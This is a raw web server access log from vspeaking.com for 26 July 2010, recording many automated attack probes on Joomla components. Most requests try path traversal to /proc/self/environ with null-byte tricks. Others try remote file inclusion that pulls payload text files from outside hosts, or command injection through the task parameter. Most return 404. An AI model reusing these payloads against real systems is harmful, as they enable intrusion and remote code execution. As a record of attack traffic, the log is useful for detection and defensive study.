76.242.100.234 - - [26/Jul/2010:05:07:51 -0700] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.vspeaking.com"
92.43.201.28 - - [26/Jul/2010:05:08:04 -0700] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.vspeaking.com"
92.43.201.28 - - [26/Jul/2010:05:08:04 -0700] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.vspeaking.com"
195.199.244.244 - - [26/Jul/2010:05:11:04 -0700] "GET /logs/access.log/index.php?option=com_joomlaflickr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.830" "www.vspeaking.com"
195.199.244.244 - - [26/Jul/2010:05:11:05 -0700] "GET /index.php?option=com_joomlaflickr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.830" "www.vspeaking.com"
195.199.244.244 - - [26/Jul/2010:05:11:05 -0700] "GET /logs/index.php?option=com_joomlaflickr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.830" "www.vspeaking.com"
76.242.100.234 - - [26/Jul/2010:05:12:36 -0700] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.vspeaking.com"
76.242.100.234 - - [26/Jul/2010:05:12:38 -0700] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.vspeaking.com"
76.242.100.234 - - [26/Jul/2010:05:12:41 -0700] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.vspeaking.com"
83.16.100.218 - - [26/Jul/2010:05:13:31 -0700] "GET /errors.php?error=http://www.yangsheng.ru/board/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
83.16.100.218 - - [26/Jul/2010:05:13:31 -0700] "GET /logs/access.log/errors.php?error=http://www.yangsheng.ru/board/fx29id.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
83.16.100.218 - - [26/Jul/2010:05:13:31 -0700] "GET /logs/errors.php?error=http://www.yangsheng.ru/board/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
76.242.100.234 - - [26/Jul/2010:05:14:23 -0700] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.vspeaking.com"
76.242.100.234 - - [26/Jul/2010:05:14:23 -0700] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.vspeaking.com"
174.142.75.205 - - [26/Jul/2010:05:14:48 -0700] "GET /logs/access.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.bangkoklimo4u.com/image_post/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
174.142.75.205 - - [26/Jul/2010:05:14:48 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.bangkoklimo4u.com/image_post/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
174.142.75.205 - - [26/Jul/2010:05:14:48 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.bangkoklimo4u.com/image_post/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
76.242.100.234 - - [26/Jul/2010:05:14:58 -0700] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.vspeaking.com"
76.242.100.234 - - [26/Jul/2010:05:14:59 -0700] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.vspeaking.com"
174.142.75.205 - - [26/Jul/2010:05:15:05 -0700] "GET /logs/access.log%20//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.bangkoklimo4u.com/image_post/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
76.242.100.234 - - [26/Jul/2010:05:15:38 -0700] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.vspeaking.com"
76.242.100.234 - - [26/Jul/2010:05:15:38 -0700] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.vspeaking.com"
86.110.175.18 - - [26/Jul/2010:05:15:52 -0700] "GET /logs/access_100517.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.vspeaking.com"
86.110.175.18 - - [26/Jul/2010:05:15:53 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.vspeaking.com"
86.110.175.18 - - [26/Jul/2010:05:15:53 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.vspeaking.com"
195.199.244.244 - - [26/Jul/2010:05:17:11 -0700] "GET /logs/access.log/index.php?option=com_joomlaflickr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.830" "www.vspeaking.com"
195.199.244.244 - - [26/Jul/2010:05:17:11 -0700] "GET /index.php?option=com_joomlaflickr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.830" "www.vspeaking.com"
195.199.244.244 - - [26/Jul/2010:05:17:11 -0700] "GET /logs/index.php?option=com_joomlaflickr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.830" "www.vspeaking.com"
80.89.233.48 - - [26/Jul/2010:05:17:49 -0700] "GET /index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.vspeaking.com"
76.242.100.234 - - [26/Jul/2010:05:18:40 -0700] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.vspeaking.com"
76.242.100.234 - - [26/Jul/2010:05:18:40 -0700] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.vspeaking.com"
188.72.70.56 - - [26/Jul/2010:05:18:55 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
188.72.70.56 - - [26/Jul/2010:05:18:55 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
188.72.70.56 - - [26/Jul/2010:05:18:55 -0700] "GET /logs/access.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
188.72.70.56 - - [26/Jul/2010:05:18:58 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
188.72.70.56 - - [26/Jul/2010:05:18:58 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
188.72.70.56 - - [26/Jul/2010:05:19:03 -0700] "GET /logs/access.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
112.104.57.22 - - [26/Jul/2010:05:19:04 -0700] "GET /index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 - "-" "libwww-perl/5.808" "www.vspeaking.com"
112.104.57.22 - - [26/Jul/2010:05:19:07 -0700] "GET /index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.vspeaking.com"
112.104.57.22 - - [26/Jul/2010:05:19:24 -0700] "GET /index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.vspeaking.com"
80.89.233.48 - - [26/Jul/2010:05:20:22 -0700] "GET /logs/access.log//index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.vspeaking.com"
80.89.233.48 - - [26/Jul/2010:05:20:22 -0700] "GET /index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.vspeaking.com"
80.89.233.48 - - [26/Jul/2010:05:20:22 -0700] "GET /logs//index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.vspeaking.com"
188.72.70.56 - - [26/Jul/2010:05:20:55 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
188.72.70.56 - - [26/Jul/2010:05:21:00 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
202.160.123.72 - - [26/Jul/2010:05:22:59 -0700] "GET /administrator/components/com_joomla-visites/core/include/errors.php?error=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
202.160.123.72 - - [26/Jul/2010:05:22:59 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/errors.php?error=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
202.160.123.72 - - [26/Jul/2010:05:23:13 -0700] "GET /logs/access_100607.log//administrator/components/com_joomla-visites/core/include/errors.php?error=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
112.104.57.22 - - [26/Jul/2010:05:26:05 -0700] "GET /logs/access.log//index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.vspeaking.com"
112.104.57.22 - - [26/Jul/2010:05:26:06 -0700] "GET /index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.vspeaking.com"
112.104.57.22 - - [26/Jul/2010:05:26:07 -0700] "GET /logs//index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.vspeaking.com"
112.104.57.22 - - [26/Jul/2010:05:27:44 -0700] "GET /logs/access.log//index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.vspeaking.com"
112.104.57.22 - - [26/Jul/2010:05:27:44 -0700] "GET /index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.vspeaking.com"
112.104.57.22 - - [26/Jul/2010:05:27:45 -0700] "GET /logs//index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.vspeaking.com"
112.104.57.22 - - [26/Jul/2010:05:27:46 -0700] "GET /logs/access.log//index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.vspeaking.com"
112.104.57.22 - - [26/Jul/2010:05:27:47 -0700] "GET /index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.vspeaking.com"
112.104.57.22 - - [26/Jul/2010:05:27:47 -0700] "GET /logs//index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.vspeaking.com"
67.195.37.180 - - [26/Jul/2010:05:28:18 -0700] "GET /logs/access.log HTTP/1.0" 200 312688 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.vspeaking.com"
188.165.213.8 - - [26/Jul/2010:05:38:14 -0700] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "vspeaking.com"
125.141.91.138 - - [26/Jul/2010:05:40:05 -0700] "GET /include/write.php?dir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "vspeaking.com"
125.141.91.138 - - [26/Jul/2010:05:40:05 -0700] "GET /logs/access.log%20%20//include/write.php?dir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "vspeaking.com"
125.141.91.138 - - [26/Jul/2010:05:40:05 -0700] "GET /logs//include/write.php?dir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "vspeaking.com"
125.141.91.138 - - [26/Jul/2010:05:40:55 -0700] "GET /include/write.php?dir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "vspeaking.com"
125.141.91.138 - - [26/Jul/2010:05:40:55 -0700] "GET /logs//include/write.php?dir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "vspeaking.com"
125.141.91.138 - - [26/Jul/2010:05:40:55 -0700] "GET /logs/access.log%20%20//include/write.php?dir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "vspeaking.com"
188.127.248.175 - - [26/Jul/2010:05:46:51 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "vspeaking.com"
64.34.172.171 - - [26/Jul/2010:05:48:28 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "vspeaking.com"
83.149.110.213 - - [26/Jul/2010:05:50:37 -0700] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
83.149.110.213 - - [26/Jul/2010:05:50:38 -0700] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
83.149.110.213 - - [26/Jul/2010:05:50:43 -0700] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
83.149.110.213 - - [26/Jul/2010:05:50:43 -0700] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
83.149.110.213 - - [26/Jul/2010:05:50:58 -0700] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
83.149.110.213 - - [26/Jul/2010:05:50:58 -0700] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
92.43.201.28 - - [26/Jul/2010:05:51:00 -0700] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.vspeaking.com"
92.43.201.28 - - [26/Jul/2010:05:51:00 -0700] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.vspeaking.com"
92.43.201.28 - - [26/Jul/2010:05:51:01 -0700] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.vspeaking.com"
92.43.201.28 - - [26/Jul/2010:05:51:01 -0700] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.vspeaking.com"
83.149.110.213 - - [26/Jul/2010:05:51:08 -0700] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
83.149.110.213 - - [26/Jul/2010:05:51:08 -0700] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
76.242.100.234 - - [26/Jul/2010:05:53:31 -0700] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.vspeaking.com"
76.242.100.234 - - [26/Jul/2010:05:53:31 -0700] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.vspeaking.com"
76.242.100.234 - - [26/Jul/2010:05:53:51 -0700] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.vspeaking.com"
76.242.100.234 - - [26/Jul/2010:05:53:51 -0700] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.vspeaking.com"
125.141.91.138 - - [26/Jul/2010:05:55:36 -0700] "GET /logs/?sourcedir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 200 2225 "-" "Mozilla/5.0" "www.vspeaking.com"
125.141.91.138 - - [26/Jul/2010:05:55:36 -0700] "GET /?sourcedir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.vspeaking.com"
125.141.91.138 - - [26/Jul/2010:05:55:36 -0700] "GET /logs/access_100517.log/?sourcedir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
64.34.172.171 - - [26/Jul/2010:06:08:08 -0700] "GET /logs/access.log//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "vspeaking.com"
64.34.172.171 - - [26/Jul/2010:06:08:08 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "vspeaking.com"
64.34.172.171 - - [26/Jul/2010:06:08:08 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "vspeaking.com"
188.127.248.175 - - [26/Jul/2010:06:10:01 -0700] "GET /logs/access.log//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "vspeaking.com"
188.127.248.175 - - [26/Jul/2010:06:10:02 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "vspeaking.com"
188.127.248.175 - - [26/Jul/2010:06:10:02 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "vspeaking.com"
122.155.9.169 - - [26/Jul/2010:06:20:59 -0700] "GET /errors.php?error=http://rollax.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
122.155.9.169 - - [26/Jul/2010:06:21:01 -0700] "GET /logs/errors.php?error=http://rollax.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
211.202.2.34 - - [26/Jul/2010:06:38:28 -0700] "GET /logs/access_100719.log//index.php?option=com_myblog&Itemid=12&task=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.vspeaking.com"
211.202.2.34 - - [26/Jul/2010:06:38:28 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.vspeaking.com"
211.202.2.34 - - [26/Jul/2010:06:38:28 -0700] "GET /logs//index.php?option=com_myblog&Itemid=12&task=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.vspeaking.com"
211.202.2.34 - - [26/Jul/2010:06:38:28 -0700] "GET /logs/access_100719.log//index.php?option=com_myblog&Itemid=12&task=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.vspeaking.com"
211.202.2.34 - - [26/Jul/2010:06:38:29 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.vspeaking.com"
211.202.2.34 - - [26/Jul/2010:06:38:29 -0700] "GET /logs//index.php?option=com_myblog&Itemid=12&task=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.vspeaking.com"
125.141.91.138 - - [26/Jul/2010:06:40:49 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
125.141.91.138 - - [26/Jul/2010:06:40:49 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
125.141.91.138 - - [26/Jul/2010:06:40:50 -0700] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
188.165.213.8 - - [26/Jul/2010:06:42:52 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.vspeaking.com"
188.165.213.8 - - [26/Jul/2010:06:45:23 -0700] "GET /logs/access.log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.vspeaking.com"
188.165.213.8 - - [26/Jul/2010:06:45:24 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.vspeaking.com"
188.165.213.8 - - [26/Jul/2010:06:45:24 -0700] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.vspeaking.com"
188.165.213.8 - - [26/Jul/2010:06:48:37 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.vspeaking.com"
218.234.23.94 - - [26/Jul/2010:06:49:41 -0700] "GET /sitemap.xml.php?mosConfig_absolute_path=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
218.234.23.94 - - [26/Jul/2010:06:49:41 -0700] "GET /logs/sitemap.xml.php?mosConfig_absolute_path=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
218.234.23.94 - - [26/Jul/2010:06:49:41 -0700] "GET /logs/access.log/sitemap.xml.php?mosConfig_absolute_path=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
114.108.151.149 - - [26/Jul/2010:06:50:11 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
188.165.213.8 - - [26/Jul/2010:06:51:12 -0700] "GET /logs/access.log///index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "vspeaking.com"
188.165.213.8 - - [26/Jul/2010:06:51:12 -0700] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "vspeaking.com"
188.165.213.8 - - [26/Jul/2010:06:51:12 -0700] "GET /logs///index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "vspeaking.com"
188.165.213.8 - - [26/Jul/2010:06:53:21 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.vspeaking.com"
66.45.240.106 - - [26/Jul/2010:06:53:58 -0700] "GET /index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "libwww-perl/5.831" "vspeaking.com"
66.45.240.106 - - [26/Jul/2010:06:53:58 -0700] "GET /index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "vspeaking.com"
66.45.240.106 - - [26/Jul/2010:06:53:58 -0700] "GET /index.php?option=com_properties&controller=....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "vspeaking.com"
66.45.240.106 - - [26/Jul/2010:06:53:58 -0700] "POST /index.php?option=com_properties&controller=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "vspeaking.com"
114.108.151.149 - - [26/Jul/2010:06:54:31 -0700] "GET /logs/access.log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
114.108.151.149 - - [26/Jul/2010:06:54:32 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
114.108.151.149 - - [26/Jul/2010:06:54:33 -0700] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
